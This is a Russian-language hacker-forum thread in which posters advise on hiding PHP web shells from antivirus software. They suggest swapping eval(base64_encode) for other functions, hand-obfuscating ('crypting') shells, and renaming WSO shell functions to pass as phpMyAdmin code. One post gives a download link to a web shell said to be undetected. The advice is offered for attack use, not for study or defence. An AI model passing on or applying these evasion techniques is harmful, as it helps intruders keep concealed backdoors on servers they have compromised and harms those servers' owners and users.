Avira выкинь в пиню. Эта живела палит все что угодно. Она зачастую на вполне нормальные файлы залу**ся. Почитай на тему ложного срабатывания Avira в inetю Если душе угодно, то измени eval(base64_encode к примеру на eval(any_transform_string_function. Eval вполне банальный элемент php кода и сам по себе не должен вызывать бунт со стороны антивирусов, за исключением подобных Avira `творений`.

Да и то, сомнительно.

Remview, никогда не палился и палится не будет!

http://temp.artofhack.kz/webshell/remview_fix.rar

Консоль! Напиши маленький консольный шелл, а дальше работай через него.

А если не умеешь писать, то есть один великолепный шелл от AK team. Весит ~5кб.

"Бесплатный сыр только в мышеловке"

Удели 5-7 часов(именно столько требуется, не более) На ручной крипт любого подходящего по функционалу шелла + переименнуй функции своими именами тот же WsoLogin() на phpmyadmin_login() и т.д. Благо дело на тему крипта php руками есть масса мануалов. Ну и как вариант попробуй написать свой шелл на perl на примере того же wso, r59.

Насчет палева - base64 не канает, т.к. он вполне удачно исполняется антивирем и виден конечный результат функций

Да можно за 1 час свой криптор сделать...